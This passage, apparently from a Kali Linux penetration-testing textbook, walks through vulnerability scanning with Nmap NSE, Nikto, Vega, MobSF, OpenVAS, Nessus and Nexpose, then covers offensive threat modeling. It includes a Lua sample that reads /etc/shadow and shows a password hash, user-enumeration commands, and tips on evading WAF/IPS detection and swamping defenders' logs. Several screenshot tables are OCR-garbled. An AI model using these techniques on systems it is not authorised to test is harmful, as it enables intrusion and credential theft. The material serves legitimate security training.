- There is always the risk of freely available code containing malicious functionalities. A penetration tester may think that they are conducting a **proof of concept (POC)** exercise and will be unaware that the exploit has also created a backdoor in the application being tested that could be used by the developer.

To ensure consistent results and create a community of coders who follow consistent practices, several exploit frameworks have been developed. The most popular exploitation framework is the Metasploit framework.

Vulnerability scanning with Nmap

There are no security operating distributions without Nmap. So far, we have discussed how to utilize Nmap during active reconnaissance, but attackers don't just use Nmap to find open ports and services, but also engage Nmap to perform the vulnerability assessment. As of March 10, 2017, the latest version of Nmap is 7.40 and it ships with 500+ NSE scripts, as shown in the following screenshot:

```
root@kali:/usr/share/nmap/scripts#
root@kali:/usr/share/nmap/scripts# ls | wc -1
554
root@kali:/usr/share/nmap/scripts# ls -la | more
total 4520
drwxr-xr-x 2 root root 81920 Mar 8 04:21 .
drwxr-xr-x 4 root root 4096 Feb 20 00:17 ...
rw-r--r-- 1 root root 3901 Dec 23 03:54 acarsd-info.nse
      -r-- 1 root root 8777 Dec 23 03:54 address-info.nse
                       3345 Dec 23 03:54 afp-brute.nse
   r--r-- 1 root root
                       6891 Dec 23 03:54 afp-ls.nse
 rw-r--r-- 1 root root
rw-r--r-- 1 root root 7001 Dec 23 03:54 afp-path-vuln.nse
                       5671 Dec 23 03:54 afp-serverinfo.nse
   -r--r-- 1 root root
                       2621 Dec 23 03:54 afp-showmount.nse
 rw-r--r-- 1 root root
     --r-- 1 root root 2262 Dec 23 03:54 ajp-auth.nse
                       2965 Dec 23 03:54 ajp-brute.nse
    r--r-- 1 root root
rw-r--r-- 1 root root 1329 Dec 23 03:54 ajp-headers.nse
   -r--r-- 1 root root 2515 Dec 23 03:54 ajp-methods.nse
                       3023 Dec 23 03:54 ajp-request.nse
 rw-r--r-- 1 root root
     --r-- 1 root root 7017 Dec 23 03:54 allseeingeye-info.nse
                       1783 Dec 23 03:54 amgp-info.nse
     --r-- 1 root root
 rw-r--r-- 1 root root 15150 Dec 23 03:54 asn-query.nse
```

Penetration testers utilize Nmap's most powerful and flexible features, which allow them to write their own scripts and also automate them to simplify the exploitation. Primarily, the NSE was developed for the following reasons:

- **Network discovery:** The primary purpose that attackers utilize Nmap for is network discovery, as we learned in the active reconnaissance section in cha pter 3, *Active Reconnaissance of External and Internal Networks*.
- **Classier version detection of a service**: There are thousands of services with multiple version details for the same service, so Nmap makes it more sophisticated to identify the service.
- **Vulnerability detection**: To automatically identify vulnerability in a vast network range; however, Nmap itself cannot be a full vulnerability scanner in itself.
- **Backdoor detection**: Some of the scripts are written to identify the pattern of backdoors. If there are any worms infecting the network, it makes the attacker's job easy to narrow down and focus on taking over the machine remotely.
- **Vulnerability exploitation**: Attackers can also potentially utilize Nmap to perform exploitation in combination with other tools such as Metasploit or write a custom reverse shell code and combine Nmap's capability with them for exploitation.

Before firing up Nmap to perform the vulnerability scan, penetration testers must update the Nmap script database to see whether there are any new scripts added to the database, so that they don't miss the vulnerability identification:

nmap --script-updatedb

Use the following to run all the scripts against the target host:

|nmap -T4 -A -sV -v3 -d -oA Target output --script all --script-argsvulns.showall target.
Introduction to Lua scripting

Lua is a lightweight embeddable scripting language, which is built on top of the C programming language, was created in Brazil in 1993 and is still actively developed. It is a powerful and fast programming language mostly used in gaming applications and image processing. The complete source code, manual, plus binaries for some platforms do not go beyond 1.44 MB (which is less than a floppy disk). Some of the security tools that are developed in Lua are Nmap, Wireshark, and Snort 3.0.

One of the reasons why Lua was chosen to be the scripting language in information security is due to its compactness, no buffer overflows and format string vulnerabilities, and because it can be interpreted.

Lua can be installed directly in Kali Linux by issuing the apt-get install lua5.3 command on the Terminal. The following code extract is the sample script to read the file and print the first line:

```
#!/usr/bin/lua
local file = io.open("/etc/shadow", "r")
contents = file:read()
file:close()
print (contents)
```

Lua is similar to any other scripting, such as Bash and Perl scripting. The preceding script should produce the output shown in the following screenshot:

```
root#kali:/usr/share/nmap/scripts# nano test.lua
root#kali:/usr/share/nmap/scripts# chmod +x test.lua
root#kali:/usr/share/nmap/scripts# ./test.lua
root:$6$hn5Vgdr9$ejXWMYodwugm42GUaIwU4EtPM3.VkgEMseP08042WkmrAqwJEVaPupzIml0x.aK
oqqJrwENjyy1Gw.7tmR7pF0:17647:0:999999:7:::
```

Customizing NSE scripts

In-order to achieve maximum effectiveness, customization of scripts helps penetration testers in finding the right vulnerabilities within the given span of time. However, most of the time attackers do not have the time limit to write one. The following code extract is a Lua NSE script to identify a specific file location that we will search for on the entire subnet using Nmap:

```
local http=require 'http'
description = [[ This is my custom discovery on the network ]]
categories = {"safe", "discovery"}
require("http")
function portrule(host, port)
  return port.number == 80
end
function action(host, port)
  local response
  response = http.get(host, port, "/config.php")
  if response.status and response.status ~= 404
    then
    return "successful"
  end
end
```

Save the file into the /usr/share/nmap/scripts/ folder. Finally, your script is ready to be tested, as shown in the following screenshot; you must be able to run your own NSE script without any problems:



To completely understand the preceding NSE script, here is the description of what is in the code:

- local http: require'http': This calls the right library from the Lua; the line calls the HTTP script and make it a local request
- description: Where testers/researchers can enter the description of the script
- categories: This typically has two variables, where one declares whether it is safe or intrusive

Web application vulnerability scanners

Vulnerability scanners suffer the common shortcomings of all scanners (a scanner can only detect the signature of a known vulnerability; they cannot determine if the vulnerability can actually be exploited; there is a high incidence of false-positive reports). Furthermore, web vulnerability scanners cannot identify complex errors in business logic, and they do not accurately simulate the complex chained attacks used by hackers.

In an effort to increase reliability, most penetration testers use multiple tools to scan web services; when multiple tools report that a particular vulnerability may exist, this consensus will direct the tester to areas that may require manually verifying the findings.

Kali comes with an extensive number of vulnerability scanners for web services, and provides a stable platform for installing new scanners and extending their capabilities. This allows penetration testers to increase the effectiveness of testing by selecting scanning tools that do the following:

- Maximize the completeness (the total number of vulnerabilities that are identified) and accuracy (the vulnerabilities that are real and not false-positive results) of testing.
- Minimize the time required to obtain usable results.
- Minimize the negative impacts on the web services being tested. This can include slowing down the system due to an increase of traffic throughput. For example, one of the most common negative effects is a result of testing forms that input data to a database, and then emailing an individual providing an update of the change that has been made; uncontrolled testing of such forms can result in more than 30,000 emails being sent!

There is significant complexity in choosing the most effective tool. In addition to the factors already listed, some vulnerability scanners will also launch the appropriate exploit and support post-exploit activities. For our purposes, we will consider all tools that scan for exploitable weaknesses to be vulnerability scanners. Kali provides access to several different vulnerability scanners, including the following:

- Scanners that extend the functionality of traditional vulnerability scanners to include websites and associated services (for example, the Metasploit framework and Websploit)
- Scanners that extend the functionality of non-traditional applications, such as web browsers, to support web service vulnerability scanning (OWASP Mantra)
- Scanners that are specifically developed to support reconnaissance and exploit detection in websites and web services (Arachnid, Nikto, Skipfish, Vega, w3af, and so on)

Introduction to Nikto and Vega

Nikto is one of the most utilized active web application scanners, which performs comprehensive tests against web servers. Its basic functionality is to check for 6,700+ potentially dangerous files or programs, along with outdated versions of servers and vulnerabilities specific to versions of over 270 servers. Nikto identifies server misconfiguration, index files, HTTP methods, and also finds the installed web server and the software version. Nikto is released based on Open-General Public License versions (https://opensource.org/li censes/gpl-license).

A Perl-based open source scanner allows IDS evasion and user changes to scan modules; however, this original web scanner is beginning to show its age, and is not as accurate as some of the more modern scanners.

Most testers start testing a website by using Nikto, a simple scanner (particularly with regards to reporting) that generally provides accurate but limited results; a sample output of this scan is shown in the following screenshot:



The next step is to use more advanced scanners that scan a larger number of vulnerabilities; in turn, they can take significantly longer to run to completion. It is not uncommon for complex vulnerability scans (as determined by the number of pages to be scanned as well as the site's complexity, which can include multiple pages that permit user input such as search functions or forms that gather data from the user for a backend database) to take several days to be completed.

One of the most effective scanners based on the number of verified vulnerabilities discovered is Subgraph's Vega. As shown in the following screenshot, it scans a target and classifies the vulnerabilities as high, medium, low, and informational. The tester is able to click on the identified results to drill down to specific findings. The tester can also modify the search modules, which are written in Java, to focus on particular vulnerabilities or identify new vulnerabilities:



Vega can help you find vulnerabilities such as reflected cross-site scripting, stored cross-site scripting, blind SQL injection, Remote File inclusion, shell injection, and others. Vega also probes for TLS/SSL security settings and identifies opportunities for improving the security of your TLS servers.

Also, Vega provides special features in the Proxy section, which allow penetration testers to query the request back and observe the response to perform the validation, which we call manual PoC. The following screenshot shows the proxy section of Vega:

| Application - Places - 🧶 Subgraph Vega - | | | Sat 67-98 • | | 100 | ¥ & - |
|--|--|--|--|---------|-----------|---------|
| Deserver and | | | Subgraph Yege | | | |
| He son Window Hear | | | | | | |
| 00/5== | | | | 01 | Harriet S | s thing |
| @ Wennis View | A Property & Personnt | h Proxy 5 | htn | | | @ ¥ = n |
| • @ 162.358.0.128 | D HONT | Herod | Regest | (100.4 | Lengt | Tere 0 |
| Πλ | 2 Interviews local | s illit | | 200 | 0504 | 321 |
| B 192,368,0.129 | http://iencoest | POST | Contrettaga | 300 | 1201 | 129 |
| e Gedenschafter et | 4 http://de/io.test/ | N ISET | Ruinkilopply.ospi | 300 | 17. | 238 |
| • E Awa | 5 http://demo.bovit | OFT. | Buek/Cogic aqui | 200 | 0664 | 111 |
| Jeogei | Intp://denso.text | N SAT | Exectionpe?tatSeath=vegifb30-+>>*ove008L27/588204> | 200 | 7246 | 200 |
| 122.000 | 7 http://deac.test | GET | failwrieibers' | 445 | 1263 | 217 |
| converturpe | http://weakitestf | 4.SET | duale/cutomite.aspe | 580 | 9093 | 231 |
| ter disck app notfixed app search app (helioachivep) search app (helioachivep) search app (helioachivep) i Style cos tervy, question app (http-s) • Constant app (ht | III CO Becarini Property HTTPULL 20108 Gales Commit Accordin Properties access Commit Accession Commit Accession 2019 Commit Accession 2019 Commit Accession 2019 Commit Accession 2019 Control Commit Accession 2019 Control Control Co | 1949-49-4 1977 49-40-54 192-40-04 | d-8 aew00arrena Med0illares-40; patrir/; MitpOniy MitDir patrir/ Mi | 1/221 | artan. | 2.4.5 |
| 0 . | | | Prony is not | 1994.00 | 3894 | of 253M |

Customizing Nikto and Vega

From Nikto version 2.1.1, the community allowed developers to debug and call specific plugins. The same can be customized accordingly from version 2.1.2. The listing can be done for all the plugins, and then you specify a specific plugin to perform any scan. There are currently around 35 plugins that can be utilized by penetration testers; the following screenshot provides the list of plugins that are currently available in the latest version of Nikto:

| rootaka | li:/usr/share/nmap/scripts# n | nikto · | -list-plugins | grep | Plugin: |
|---------|-------------------------------|---------|---------------|------|---------|
| Plugin: | httpoptions | | | | |
| Plugin: | report xml | | | | |
| Plugin: | ssl | | | | |
| Plugin: | report html | | | | |
| Plugin: | auth | | | | |
| Plugin: | apache expect xss | | | | |
| Plugin: | paths | | | | |
| Plugin: | sitefiles | | | | |
| Plugin: | outdated | | | | |
| Plugin: | tests | | | | |
| Plugin: | msgs | | | | |
| Plugin: | apacheusers | | | | |
| Plugin: | report text | | | | |
| Plugin: | ms10 070 | | | | |
| Plugin: | drupal | | | | |
| Plugin: | subdomain | | | | |
| Plugin: | cookies | | | | |
| Plugin: | clientaccesspolicy | | | | |
| Plugin: | dictionary | | | | |
| Plugin: | siebel | | | | |
| Plugin: | content_search | | | | |
| Plugin: | report nbe | | | | |
| Plugin: | embedded | | | | |
| | | | | | |

For example, if attackers found a banner information as Apache server 2.2.0, Nikto can be customized to run specific plugins only for Apache user enumeration by running the following command:

nikto.pl -host target.com -Plugins "apacheusers(enumerate, dictionary:users.txt);report_x

Attackers can also point Nikto scans to burp or any proxy tool by nikto.pl -host <hostaddress> -port <hostport> -useragentnikto -useproxy http://127.0.0.1:8080.

Penetration testers should be able to see the following information:



When the Nikto plugin is run successfully, the apacheusers.xml output file should include the active users on the target host.

Similar to Nikto, Vega also allows us to customize the scanner by navigating to the window and selecting Preferences, where one can set up general proxy configuration or even point the traffic to a third-party proxy tool. However, Vega has its own proxy tool that can be utilized. The following screenshot provides the scanner options that can be set before beginning any web application scan:



Attackers can define their own User-Agent or mimic any well-known User-Agent headers, such as IRC bot or Google bot, and also configure the maximum number of total descendants and sub processes, and the number of paths that can be traversed; for example, if the spider reveals www.target.com/admin/, there is a dictionary to add to the URL as www.target.com/admin/secret/ and the maximum by default is set to 16, but attackers would be able to drill down by utilizing other tools to maximize the effectiveness of Vega and would select precisely the right number of paths and, also, in case of any protection mechanisms in place such as WAF or Network level IPS, pentesters can select to scan the target with a slow rate of connections per second to send to the target. One can also set the maximum number of the response size; by default, it is set to 1 MB (1,024 KB).

Once the preferences are set, the scan can be further customized while adding a new scan. When penetration testers click on New Scan, enter the base URL to scan, and click Next, the following screen should allow the testers to customize the scan:



Vega provides two sections to customize: one is Injection Modules and the other is Response Processing Modules:

- **Injection Modules:** This includes a list of exploit modules that are available as part of built-in Vega web vulnerability databases and it queries in-built to test the target for those vulnerabilities such as Blind SQL injection, XSS, Remote file inclusion, local file inclusion, and header injections.
- Response Processing Modules: These include a list of security misconfigurations that can be picked up as part of the HTTP response such as directory listing, error pages, cross-domain policies, and version control strings. Vega also supports testers adding their own plugin modules (https:// github.com/subgraph/vega/).

Vulnerability scanners for mobile applications

Penetration testers often ignore mobile applications in app stores (Apple, Google, and others); however, these applications also serve as a network entry point. In this section, we will run through how quickly one can set up a mobile application scanner and how one can combine the results from mobile application scanner and utilize the information, to identify more vulnerabilities and achieve the goal of the penetration testing.

Mobile Security Framework (**MobSF**) is an open source, automated penetration testing framework for all the mobile platforms, including Android, iOS, and Windows. The entire framework is written in the Django Python framework.

This framework can be directly downloaded from https://github.com/MobSF/Mobile-Se
curity-Framework-MobSF, or it can be cloned in Kali Linux by issuing the git clone
https://github.com/MobSF/Mobile-Security-Framework-MobSF Command.

Once the framework is cloned, the following steps are followed to bring up the mobile application scanner:

- 1. cd into the Mobile-Security-Framework-MobSF folder:
- cd Mobile-Security-Framework-MobSF/
- 2. Install the dependencies using the following command:
- python3 -m pip install -r requirements.txt
- 3. Once all the installation is complete, test for the configuration settings by entering python3 manage.py test. You should be able to see something similar to the following screenshot:



4. Migrate the application's current installation:

python manage.py migrate

5. Run the vulnerability scanner using python manage.py runserver yourIPaddress:portnumber, as shown in the following screenshot:



- 6. Access the URL http://yourIPaddress:Portnumber in the browser and upload any mobile applications found during the reconnaissance to the scanner to identify the entry points.
- 7. Once the files are uploaded, penetration testers can identify the disassembled file in the scanner, along with all the other important information:



The scan output will provide all the mobile application configuration information such as activities, services, receivers, providers etc. Sometimes, these configuration information provides hardcoded credentials or cloud API keys that can be utilized on other identified services and vulnerabilities. During a penetration testing exercise, we found a developer account username and base64 password in one of the Java files that was commented on target's mobile application, that allowed access to the external VPN of the organization.

The more important portions of the mobile security framework are in the URLs, malware, and the strings.

The OpenVAS network vulnerability scanner

Open Vulnerability Assessment System (OpenVAS) is an open source vulnerability assessment scanner and also a vulnerability management tool often utilized by attackers to scan a wide range of networks, which includes around 47,000 vulnerabilities in its database; however, this can be considered a slow network vulnerability scanner compared with other commercial tools such as Nessus, Nexpose, and Qualys.

If OpenVAS is not already installed, make sure your Kali is up to date and install the latest OpenVAS by running the apt-get install openvas command. Once done, run the openvas-setup command to set up OpenVAS; to make sure the installation is OK, run the openvas-check-setup command and it will list the top 10 items that are required to run OpenVAS effectively. Once the installation is successful, testers should be able to see the following screenshot:

DE: seltprog found Step 3: Checking user configuration NARNING: Your password policy is empty. ENGOEST: Edit the /etc/openvas/pwpolicy.conf file to set a password policy. Step 4: Checking Greenhone Security Assistant (GGA) ... OR: Greenhone Security Assistant is present in version 6.0.11. Step 5: Checking OpenVAS CLI . OK: OpenVAS CLI version 1.4.5. Step 6: Checking Greenbone Security Desktop (GSD) ... SKIP: Skipping check for Greenbone Security Desktop Step 7: Checking if OpenVAS services are up and running ... OK: netstat found, extended checks of the OpenVAS services enabled. OK: OpenVAS Scanner is running and listening only on the local interface OK: OpenVAS Scanner is listening on port 9391, which is the default port WARNING: OpenVAS Manager is running and listening only on the local interface. This means that you will not be able to access the OpenVAS Manager from the outside using GSD or OpenVAS CLI. SDGGES7: Ensure that OpenVAS Manager listens on all interfaces unless you want a local service only. OK: OpenVAS Manager is listening on port 9390, which is the default port. OK: Greenbone Security Assistant is listening on port 443, which is the default port. Step B: Checking mmap installation NARNING: Your version of mmap is not fully supported: 7.40 SUGGEST: You should install mmap 5.51 if you plan to use the nmap NSE NVTs. Step 10: Checking presence of optional tools ... OK: pdflatex found. OR: PDF generation successful. The PDF report format is likely to work. OK: sch-keygen found, LSC credential generation for GNU/Linux targets is likely to work. OK: rpm found, LSC credential package generation for NPM based targets is likely to work OK: alien found, LSC credential package generation for DEB based targets is likely to work. OK: nsis found, LSC credential package generation for Microsoft Windows targets is likely to work It seems like your OpenVAS-8 installation is OK. If you think it is not OK, please report your observation and help us to improve this check routine: http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyse the problem

The next task is to create an admin user by running the openvasmd --user=admin -new-password=YourNewPassword1, --new-password=YourNewPassword1 command, and start up the OpenVAS scanner and OpenVAS manager services by running the openvasstart command from the prompt. Depending on bandwidth and computer resources, this could take a while. Once the installation and update is complete, penetration testers should be able to access the OpenVAS server on port 9392 with SSL (https://localhost:9392), as shown in the following screenshot:



The next step is to validate the user credentials by entering the username as admin and password as yournewpassword1, and testers should be able to log in without any issues and see the following screenshot. Attackers are now set to utilize OpenVAS by entering the target information and clicking Start Scan from the scanner portal:

| | | Gr | reenbone Security | Assistant - Mozilla Fir | efox | | 0 9 |
|----------------|-------------------|--|--------------------|-------------------------|---------------|---|--|
| Greenbane Se | wity A., * + | | | | | | |
| @ PR https: | //127.0.0.1 9392/ | mp?r=1&token= | 451/2706-9:60-467 | re-fical d 9, 5 | earch) | ☆ é ♣ | * * |
| fost Visited~ | Offensive Securit | V Nations N | Kall Docs N Kall T | Fools 🤏 Exploit-DB 🐚 | Aactack-og 🔟 | Kali Forums 🥆 NetHur | nter |
| Greenbor | 1e | | | No auto | refresh • | Logged in as Admin | n admin : Loui |
| Destmoard | Scame | Assets | Secials | Configuration | Estres | Adversituation | Help |
| - | | | | | | | |
| Dachh | and | | | | | | 10 |
| Dashba | Jaru | | | | | | |
| | | | | | | the second se | |
| | Tasks by Severit | v Class (Total: 0) | | | Tasks by sta | due (Total: 0) | |
| | Tasks by Severit | y Class (Total: 9) | | • | Tasks by sta | atus (Total: 0) | |
| | Taska by Severit | ly Class (Total: 0) | | • | Tasks by sta | etus (Tetal: 0) | |
| | Tasks by Severit | ly Class (Total: 0) | | • | Tirsks by sta | atus (Total: O) | |
| | Taska by Severit | ry Class (Total: 0) | | • | Tasks by sta | atun (Tistal: O) | |
| 1.00 | Taska by Severit | iy Class (Total: 9) | | • | Tasks by sta | atun (Total: O) | |
| 20 | Taska by Severit | y Class (Total: 9) | | | Tivsks by sta | atus (Tetal: 0) | |
| 1 | Taska by Severit | y Class (Total: 0) | | • | Tanka by st | stus (Total: O) | |
| | Taaka by Severit | y Class (Total: 0) | | | Tanks by st | itus (Total: O | |
| | Taska by Saverit | y Class (Total: 0) | | | Tanks by st | stus (Total: O) | |
| | Tasks by Severit | y Class (Total: 0) | | 0 | Tanks by st | dus (Tatal: 0) | |
| 1 | Tasks by Savari | y Class (Total: 0) | | | Tasks by st | dus (Total: 0) | |
| | Taska by Severit | ry Class (Total: Q) | | | Tinks by et | dus (Total: 0) | |
| | Taska by Severit | ry Claus (Total: Q) | | | Tanks by et | dus (Tatal: 0) | |
| | Tasks by Severit | y Claus (Total: Q) | | C | Tanks by sta | dius (Total: 0) | |
| C | Taska by Severit | ry Class (Total: Q) | | | Tinks by st | dius (Total: 0) | |
| C | Taska by Severit | ry Classe (Total: Q) | | | Tanks by et | due (Tatal: 0) | |
| C | Taska by Severit | y Classe (Total: Q) | | | Tanks by sta | sius (Tetal: 0) | |
| | Taska by Severit | ry Class (Total: Q) | | | Taska by sta | stus (Total: 0) | |
| | Taska by Severit | ry Class (Total: Q) | | | Tasks by sta | stus (Total: 0) | |
| | Taska by Severit | y Class (Total: Q) | Hosts | Topology | Tanka by sta | etues (Tintal: 0) | al: 474701 |
| | Taska by Severit | ry Class (Total: Q) | Hosts | topology | Taska by sk | étues (Tietali: 0) | al: 474701 |
| EVES By most | Taska by Severit | y Class (Total: Q) | Hosts | topology | Tinks by sta | stus (Total: 0) | adt 474701 |
| Cutes by creat | Taska by Severit | ry Class (Total: Q) | Hosts | topology | Tinks by sk | étue (Tatal: 0) | 211147/23/01 |
| EVER by read | Inska by Severit | vy Classe (Total: Q) | Hosts | topology | Taska by sk | due (Tatal: 0) | Fill 4741701 High Medium |
| | Taska by Severit | y Class (Total: Q) | Hosts | topology | Tinks by sk | Stars (Total: 0) | 218422301 High Medium Low |
| | Taska by Severit | V Ciana (Total: 0) | Hosts | topology | Taska by sk | Stue (Tetals 0) | This 474 7401 |
| | Taska by Severit | y Class (Total: 0) 336131 - 120.030 - 120.030 - 120.030 - 10.030 - 10.030 - 10.030 | Hosts | topology | Taska by ski | Stues (Testal: 0) | 2011 47/43/01 High Medium Low Log |
| CUES By 17051 | Taska by Severit | y Class (Total: 0) 336131 - 116.030 196.040 96.040 96.040 96.040 96.040 96.040 | Hosts | topology | - NUTE | | TH 47.5701 High Medium Log |

Customizing OpenVAS

Unlike any other scanners, OpenVAS is also customizable for scan configuration: it allows testers to add credentials, disable particular plugins, set the maximum and minimum number of connections that can be made, and so on. The following screenshot shows the different scanning settings to customize:

| | | Gre | enbone Security A | ssistant - Mozilla Firefor | i. | | | | | | 0 | 0 | 0 |
|---|-----------------------|--------------------------|-----------------------|----------------------------------|--------|---------------|-----------|-------------|--------|-------|-------|--------|-----|
| Sceenbore Se | curity A_ # (+ | | | | | | | | | | | | |
| + @ + https://1 | 127.0.0.1 9392/ort | p7cmd=ijet_configs | Atolom=45117706 | 5c60 @ 9, 5ear | ń. | | | 1 | e i | ð. | ÷ | e | = |
| Most Visited - | Offensive Securit | ty 🔨 Kali Limite 🥆 K | ali Docs 🥆 Kali To | ols 🍝 Explait-Dið 👠 Am | zack-n | 9 2 4× | al For | uns 🔪 | Neth | unter | | | |
| 🐠 Deshbeard | Scana | Assets | Secinite | Configuration | D.C. | | (A | destruction | 84 | | | ir . | |
| Scan C | Configs (8 c | of 8) | | | _ | _ | | | | 00 | 1.00 | 10 | 10 |
| Name | | | | | | Total | Trend | Total | Trees | - | tions | | |
| Discovery Network Discovery | scan configuration. | í | | | - | 22 | | 2360 | | 8 | 80 | 8 | 1 |
| empty Empty and static co | onfiguration temple | dw.) | | | | 0 | | 0 | | 6 | 20 | 8 | |
| Full and fast UNest NVTs: optimiz | ed by using previou | isly collected informati | ton.1 | | - | 62 | - | 47450 | - | 13 | - | 0 | |
| Full and fast ultim INEST NVT's includin | ig those that can st | op services/hosts: opt | imized by using pre | viously collected information | an.) | 62 | - | 47450 | | B | 80 | 8 | - |
| Full and very deep (Meat NVTh; den't tr | nust previously colle | ched information; slow | .1 | | - | 62 | 12 | 47450 | 2 | 13 | 80 | 8 | |
| Full and very deep (Nest NVT's includin | g those that can st | op services/hosts: dor | 't trust previously o | elected information: slow. | = | 62 | | 47450 | 12 | 13 | 80 | 8 | |
| Host Discovery INetwork Host Disco | wery scan configura | zion.) | | | | 2 | | 2 | - | 6 | 80 | 0 | |
| System Discovery Instavork System Dis | scovery scan config | ruration.) | | | | 6 | | 29. | | 6 | | 8 | |
| Applicat Plan mapped 0 for | ra-l anterarse | | | | | | 1 | Agory to | ange o | | 1.80 | 8 | |
| Numericsseries 1324 | | | Crienter | e Security Assistant (1554) Cent | 111 | 0.0124 | try Conie | thing Sets | nnin G | -en.) | | intest | int |

Commercial vulnerability scanners

Most attackers utilize open source tools to launch attacks; however, commercial vulnerability scanners come with their own advantages and disadvantages in speeding up the penetration testing process. In this section, we will learn Nessus and Nexpose installation in Kali Linux, and since these scanners are backed up by respectable companies, they do have comprehensive documentation, so we will not be taking a deep dive into configuring these tools.

Nessus

Nessus was one of the old vulnerability scanner that was started by Renaud Deraison in 1998, it used to be a open source project till 2005, the project was taken over by Tenable Network Security (co-founded by Renaud). Nessus is one of the most commonly used commercial vulnerability scanners in the security community for network infrastructure scanning. Although Tenable has multiple security products. In this section, we will explore the installation of Nessus Professional.

The following provides step-by-step instructions on how to install Nessus on Kali Linux:

- 1. Register as a normal user by visiting https://www.tenable.com/try and selecting Try Nessus Professional Free.
- 2. Download the right version of Nessus from https://www.tenable.com/downloads/.
- 3. Once Nessus is downloaded, run the installer, as shown in the following command:
- dpkg -i Nessus-8.1.2-debian6_amd64.deb

Testers should be able to see the following screenshot in their Kali Linux:

root@kali:/Nessus# dpkg -i Nessus-8.1.2-debian6_amd64.deb Selecting previously unselected package nessus. (Reading database ... 449273 files and directories currently installed.) Preparing to unpack Nessus-8.1.2-debian6_amd64.deb ... Onpacking nessus (8.1.2) ... Setting up nessus (8.1.2) ... Unpacking Nessus Scanner Core Components... - You can start Nessus Scanner by typing /etc/init.d/nessusd start - Then go to https://kali:8834/ to configure your scanner Processing triggers for systemd (239-15) ...

- 4. Next step is to start the nessus service by running service nessusd start, which should bring Nessus up on our system.
- 5. By default, the Nessus scanner runs on port 8834 over SSL. Attackers should

| secure mtps://192.100.0.24:0034/#/ | |
|--------------------------------------|--|
| | |
| | |
| | |
| | |
| | |
| | stori Nessus |
| | |
| | Create an account |
| | To use this scanner, an account must be create |
| | targets and should be treated as a root user. |
| | Usemame * |
| | |
| | |
| | Password * |
| | |

be able to see the following screenshot following a successful installation:

- 6. Add a new user and activate the license; your scanner will download all the relevant plugins, based on your license.
- 7. Finally, you should be able to see Nessus up and running, as shown in the following screenshot, where it is ready to launch a scan against the target systems/network:

| + O A Mitselas | 1 March 192 192 24 101 19 Witcom | Apirta An | | 0 0 m 0 0 | |
|--|----------------------------------|-----------------------|---------------------------|------------------|--|
| Nessus 🕘 | Same Setings + Balata Kana | | | | anne 🔒 |
| Oylesina All leans | Same | | | | (Includes) R |
| Trans Transmission Transmission | Advented Dynamic State | Advantation | Audit Cloud Schartbuchers | Reduct Ortechien | Back Destantion |
| Constant Apply Constant Sciences | Book Herverk Scin | Coductive Facts Audit | 0000WV Octastice | Hoet Discovery | Event AMT Security Evenus International Security Evenus |
| | bianal PG Notanel Sum | CO Malacen State | EDM Carrily Audit | Bakke Dreise has | Office Lards |

Nexpose

Similar to Nessus, Rapid 7 Nexpose is another widely used commercial vulnerability scanner that supports the entire life-cycle of vulnerability management for any organization. Attackers who would like to utilize this scanner can request a free trial.

The following are step-by-step instructions on installing Rapid 7 Nexpose in Kali Linux:

- Register the account with Rapid 7 (https://www.rapid7.com/products/nexpose/reque st/; you may require a valid business email ID to receive the activation code.
- 2. Download the installer from the website by running this:
- wget http://download2.rapid7.com/download/InsightVM/Rapid7Setup-Linux64.bin

Change the file permission of the downloaded file by running the following command; the command will throw errors if the system requirements are not met:

```
chmod +x Rapid7Setup-Linux64.bin
./Rapid7Setup-Linux64.bin
```

The scanner will require you to enter the details such as username, password, and certificate. Follow the instructions and once completed, you should be able to see the following screenshot that indicates the successful installation of Nexpose:

```
Additional Tasks Selection
You have selected the following installation location:
/opt/rapid7/nexpose
You have selected the following component(s) to install:
Security Console, Scan Engine
You have entered the following contact information:
vijay velu, cyberhia
You have created the following user name:
vijay
Select any additional installation tasks.
Initialize and start after installation?
Yes [y], No [n, Enter]
  *********
Extracting files...
           * * * * * * * * * * * * * * * * *
Extracting files...
 plugins/java/1/GentooLinuxScanner/1/110n-ja-jp.jar
```

- 3. By default, Nexpose runs on port 3780 over SSL, so testers can access the application at https://localhost:3780/.
- 4. Nexpose will download all the plugins for the license that you have, so finally you should be able to log in to the vulnerability scanner, as shown

here:

| A Net Jacob Heave 1921680245750/Hartenanca-legiside | 2 0 0 2 3 4 5 4 5 5 1 | |
|---|------------------------------|---|
| lague no Compose e a composi on travenum ancio mosto, sumeto amazilia te na partical del to in Indonerazione recele. Teri mane intermediane, pletale sue travitado Rem | RAPID | auer gen mij mij en wee in hem ei fersten moert wee en gene |
| | Lag an Deceme | |
| | Pression | |
| | | RAPID |

Specialized scanners

The exploitation phase of the kill chain is the most dangerous one for the penetration tester or attacker; they are directly interacting with the target network or system and there is a high chance that their activity will be logged or their identity discovered. Again, stealth must be employed to minimize risks to the tester. Although no specific methodology or tool is undetectable, there are some configuration changes and specific tools that will make detection more difficult.

Another scanner worth using is the **Web Application Attack and Audit Framework (w3af)**, a Python-based open source web application security scanner. It provides preconfigured vulnerability scans in support of standards such as OWASP. The breadth of the scanner's options comes at a price: it takes significantly longer than other scanners to review a target, and it is prone to failure over long testing periods. A w3af instance configured for a full audit of a sample website is shown in the following screenshot:



Kali also includes some application-specific vulnerability scanners. For example, WPScan is used specifically against WordPress CMS applications.

Threat modeling

The passive and active reconnaissance phases map the target network and system, and identify vulnerabilities that may be exploitable to achieve the attacker's objective. During this stage of the attacker's kill chain, there is a strong desire for action; testers want to immediately launch exploits and demonstrate that they can compromise the target. However, an unplanned attack may not be the most effective means of achieving the objective, and it may sacrifice the stealth that is needed to achieve it.

Penetration testers have adopted (formally or informally) a process known as threat modeling, which was originally developed by network planners to develop defensive countermeasures against an attack.

Penetration testers and attackers have turned this defensive threat modeling methodology on its head to improve the success of an attack. Offensive threat modeling is a formal approach that combines the results of reconnaissance and research to develop an attack strategy. An attacker has to consider the available targets and identify the types of targets, listed as follows:

- **Primary targets**: These are the primary entry point targets to any organization and when compromised, they serve the objective of a penetration test
- **Secondary targets**: These targets may provide information (security controls, password and logging policies, and local and domain administrator names and passwords) to support an attack or allow access to a primary target
- **Tertiary targets:** These targets may be unrelated to the testing or attack objective, but are relatively easy to compromise and may provide information or a distraction from the actual attack

For each target type, the tester has to determine the approach to be used. A single vulnerability can be attacked using stealth techniques, or multiple targets can be attacked using a volume of attacks in order to rapidly exploit a target. If a large-scale attack is implemented, the noise in the defender's control devices will frequently cause them to minimize logging on the router and firewall, or even

fully disable it.

